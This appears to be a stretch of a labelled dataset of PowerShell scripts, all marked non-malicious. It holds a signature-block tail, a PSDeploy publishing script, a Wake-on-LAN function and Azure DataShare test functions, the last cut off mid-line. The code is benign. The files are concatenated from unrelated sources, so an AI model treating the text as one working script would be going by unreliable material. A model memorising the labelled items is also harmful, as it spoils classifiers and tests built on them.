tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGl8k/WOj6z0bttC4o6hCjJy # psg0bZgecsN+D+tB0WSVMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAtASTTsaMQo3IKLrDMwpyc/yiL6TeywJfqLNeUUXNEYzvFkaqool65vCZ # FQjOcz093l4PxnpmWppgRMWFyk1YCl+nqU2H23bDUbvrf3PCnqr6c+GBJXuFIfjz # kG3MNlPL+OOErwFF6Lm+Fl+myP+c5t9zzBc/Q8ZmRua2wE9oC+xFYBQTz7YFmAD8 # LOpOMoBL9pyLewtNxoKyaklha2iYpdziuW8d7DUsmpSH9aj1nAhDPiAw8YGK8AiD # MAXOFfnmZEAzLQdugEb+PhdW0CUMGwAYQOQj3sPHilH2cc0ld3e6/TvvCpcp4pnz # iV09g8Qmss+oGlWMOua1gaJNMTkvZ6GCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCB83jMyDY36xsW07nbpzC9WgqofY/hTq8jObxbPAZ9BXwIGZiAsyET0 # GBMyMDI0MDQyMzEzMTYxNC4yNzVaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpEMDgyLTRC # RkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvIsyA1sjg9kSKJzelrUWF5 # ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0RaGrU8EHydF8NxPMR2KVNi # AtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYniwKLPQLJ00EkXw5TSwfm # JXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdFLKwo4BTlEgnvzeTfXukz # X8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8XlBQDVDX5JeMEsx7jgJDdE # nK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7rSFvcLnwAqMdqcy/iqQP # MlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg8oWwXyiv3+bGB6dmdM61 # ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/DbUSqW2RqTUa2O2KuvsyRG # MEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+fdTw+geRn6Mo2S6+/bZEw # S/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGVPRqkmz5UYz+R5ybMJWj+ # mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0phjUTH2GChHIvE4SDSk2hw # WP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU6HPSBd0OfEX3 # uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANnrb8Ewr8eX/H1s # Kt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g6Tf7tNx1q0NpKk1JTupU # JfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXTMzxiewfErVLt8Wefebnc # ST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz/zEA1AbZL/viXtHmryA0 # CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+dh+UsFi0d4lkdcE+Zq5JN # jIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YWzhP/5XQnYl03AfXErn+1 # Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1qy4y4vlVKaShtbdfgPyG # eeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3hsHzG8n5u5CQajPwx9Pzp # sZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4QwGf5B71x57OjaX53gxT4 # vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ062nyIZKnsXxzuKFb0TjXW # w6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0bSrAlVeihcaG5F74SZT8 # FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpE # MDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJfSbL3djnQEqaggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnRQkowIhgPMjAyNDA0MjMwNDA4NDJaGA8yMDI0MDQyNDA0MDg0MlowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6dFCSgIBADAHAgEAAgIUTDAHAgEAAgISBDAKAgUA # 6dKTygIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAKdfQ6krn/9XKU8Iy031 # XFlG85OEXSoh4dBGaqeGlD943dkMdlPnjE+MNokMWYaQ0JNKwtpMkAnPoDcyylCP # CELlR54i9KaOR7WJp72VKtL04H/EbopdGU86A523FLhAdtVx7+UUaWwr/s7KcbHa # SrCmgPUrOzaTxyDnHHkwJ3OWMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQggBzKd+oDWXZxN3wP/sIrTB3PoQe8zLIegp7DhonQxUkwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0Ou0IqxELDhX2TLylxIIN # NzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3MHg # jMJfWF6OAAEAAAHcMCIEIMlj5Czdui1+yXOeEgNyO7aqtd0QRMsB+0i74NsgRz7z # MA0GCSqGSIb3DQEBCwUABIICAFrTMdrgy32iWACHT2Lm8uiNOuUH68YsoRfta8V3 # 4HJzJIuxpOgEOlsFIks5GSj1YUi29JlYrFj+6xf6gWWW2BgmqRt0T3mmKuGNQUcf # CRvIdhkubbup58tShJ+13gIMuCJKOtsWJLeUxLWXXMD3OUXK65Hpym6zXqBZ/Gzh # LK7fj6Oro7hJmHtGwjGO8UP15ST7ZRtO8DOdA5AGr6I/tnF/aT1gsG8XC/Lh6R9U # fYrE9rfoVxtcpCErq3zvFmJUsfzHPYLd8MZMQ0OepHjamcLD5bE6JGLtX+YwVsa0 # YSEcRlar3xcB1WLJCHznOX6kBOZT32h6X9f3jY+XEXESrYq+xWZdiYrZM/SbFmCD # iIt06T978u13ggmt4aojaJRuG2wngIim4T/kYrSB7CXCNU6yrQkQHxrFk81nlDbg # 7oEAGEtliOHfjIiuILV3xegKT2xuaB+bVdE5QU9Cdjik4JZ4DMLYFt3xIRQZyHRq # 0J1iz5UMpC6301OXAmVveBRMnlfhETaxitrqsxBcfZPnb8oZDdcwb8UhBq0xNYLk # An+Zs2UY8Y5/0hz7LXbATTYCA76NnBqRyZKZN2DyjTXYWi8q2Sn3ayjAGhLVrZGi # e1Jlrpq3HkttbR3Y/7P1kDcD8spLsu2DulpJlajSDg8+RXvrk77N9sLv9IIdGquq # lI/x # SIG # End signature block
combined_dataset/train/non-malicious/3183.ps1
3183.ps1
if( $env:BHPSModulePath -and $env:BHBuildSystem -ne 'Unknown' -and $env:BHBranchName -eq "master" -and $env:BHCommitMessage -match '!deploy' ) { Deploy Module { By PSGalleryModule { FromSource $ENV:BHPSModulePath To PSGallery WithOptions @{ ApiKey = $ENV:NugetApiKey } } } } else { "Skipping deployment: To deploy, ensure that...`n" + "`t* You are in a known build system (Current: $ENV:BHBuildSystem)`n" + "`t* You are committing to the master branch (Current: $ENV:BHBranchName) `n" + "`t* Your commit message includes !deploy (Current: $ENV:BHCommitMessage)" | Write-Host } if( $env:BHPSModulePath -and $env:BHBuildSystem -eq 'AppVeyor' ) { Deploy DeveloperBuild { By AppVeyorModule { FromSource $ENV:BHPSModulePath To AppVeyor WithOptions @{ Version = $env:APPVEYOR_BUILD_VERSION } } } }
combined_dataset/train/non-malicious/Modified WOL impl_1..ps1
Modified WOL impl_1..ps1
function SendUdpWol { #Packet construction reference: #- http://wiki.wireshark.org/WakeOnLAN #- http://en.wikipedia.org/wiki/Wake-on-LAN # #This code is a modified version of: # - http://thepowershellguy.com/blogs/posh/archive/2007/04/01/powershell-wake-on-lan-script.aspx param ( [parameter(Mandatory=$true)] [ValidateLength(17,17)] [ValidatePattern("[0-9|A-F]{2}:[0-9|A-F]{2}:[0-9|A-F]{2}:[0-9|A-F]{2}:[0-9|A-F]{2}:[0-9|A-F]{2}")] [String] $MacAddress, [parameter(Mandatory=$false)] [int[]] $Ports=@(0,7,9) ) [int]$MAGICPACKETLENGTH=102 #'Constant' defining total magic packet length. [Byte[]]$magicPacket=[Byte[]](,0xFF * $MAGICPACKETLENGTH) #Initialize packet all 0xFF for packet length. [Byte[]]$byteMac=$MacAddress.Split(":") |% { #Convert the string MacAddress to a byte array (6 bytes). [Byte]("0x" + $_) } #Starting from byte 6 till 101, fill the packet with the MAC address (= 16 times). 6..($magicPacket.Length - 1) |% { $magicPacket[$_]=$byteMac[($_%6)] } #Setup the UDP client socket. [System.Net.Sockets.UdpClient] $UdpClient = new-Object System.Net.Sockets.UdpClient foreach ($port in $Ports) { $UdpClient.Connect(([System.Net.IPAddress]::Broadcast),$port) #Send packet on each defined port. Write-Verbose $("Sending magic packet to {0} port {1}" -f $MacAddress,$port) [Void]$UdpClient.Send($magicPacket,$magicPacket.Length) #Don't return the packet length => [void] } $UdpClient.Close() }
combined_dataset/train/non-malicious/3692.ps1
3692.ps1
function Test-SynchronizationStart { $resourceGroup = getAssetName $AccountName = getAssetName $ShareName = getAssetName $Mode = "FullSync" $ResourceId = "/subscriptions/c39dce18-cead-4065-8fb1-3af7683a5038/resourceGroups/sdktestingadsrg4712/providers/Microsoft.DataShare/accounts/sdktestingshareaccount9776/shareSubscriptions/sdktestingshare1" $endAndStartTime = "06/26/2019 01:15:47" $syncStatus = "Succeeded" $sync = Start-AzDataShareSubscriptionSynchronization -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareSubscriptionName $ShareName -SynchronizationMode $Mode Assert-NotNull $sync Assert-AreEqual $sync.startTime $endAndStartTime Assert-AreEqual $sync.endTime $endAndStartTime Assert-AreEqual $sync.status $syncStatus $sync = Start-AzDataShareSubscriptionSynchronization -ResourceId $ResourceId -SynchronizationMode $Mode Assert-NotNull $sync Assert-AreEqual $sync.startTime $endAndStartTime Assert-AreEqual $sync.endTime $endAndStartTime } function Test-SynchronizationCancel { $resourceGroup = getAssetName $AccountName = getAssetName $ShareName = getAssetName $SynchronizationId = "20a43c32-81d2-4a03-a878-9c2c389e7ea8" $sync = Stop-AzDataShareSubscriptionSynchronization -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareSubscriptionName $ShareName -SynchronizationId $SynchronizationId Assert-NotNull $sync Assert-AreEqual $sync.status "Succeeded" $ResourceId = "/subscriptions/c39dce18-cead-4065-8fb1-3af7683a5038/resourceGroups/sdktestingadsrg4712/providers/Microsoft.DataShare/accounts/sdktestingshareaccount9776/shareSubscriptions/sdktestingshare1" $sync = Stop-AzDataShareSubscriptionSynchronization -ResourceId $ResourceId -SynchronizationId $SynchronizationId Assert-NotNull $sync Assert-AreEqual $sync.status "Succeeded" } function Test-ListShareSubscriptionSynchronizationCrud { $resourceGroup = getAssetName $AccountName = getAssetName $ShareSubscripitonName = getAssetName $listSync = Get-AzDataShareSubscriptionSynchronization -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareSubscriptionName $ShareSubscripitonName Assert-NotNull $listSync Assert-AreEqual $listSync[0].status "Succeeded" Assert-AreEqual $listSync[1].status "InProgress" Assert-AreEqual $listSync[2].status "Failed" } function Test-ListShareSubscriptionSynchronizationDetailsCrud { $resourceGroup = getAssetName $AccountName = getAssetName $ShareSubscripitonName = getAssetName $SynchronizationId = "02a17faa-4498-45ee-a884-162180af9251" $listSyncDetails = Get-AzDataShareSubscriptionSynchronizationDetail -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareSubscriptionName $ShareSubscripitonName -SynchronizationId $SynchronizationId Assert-NotNull $listSyncDetails Assert-AreEqual $listSyncDetails[0].status "Succeeded" Assert-AreEqual $listSyncDetails[1].status "InProgress" Assert-AreEqual $listSyncDetails[2].status "Failed" } function Test-ListShareSynchronizationCrud { $resourceGroup = getAssetName $AccountName = getAssetName $ShareName = getAssetName $listSync = Get-AzDataShareSynchronization 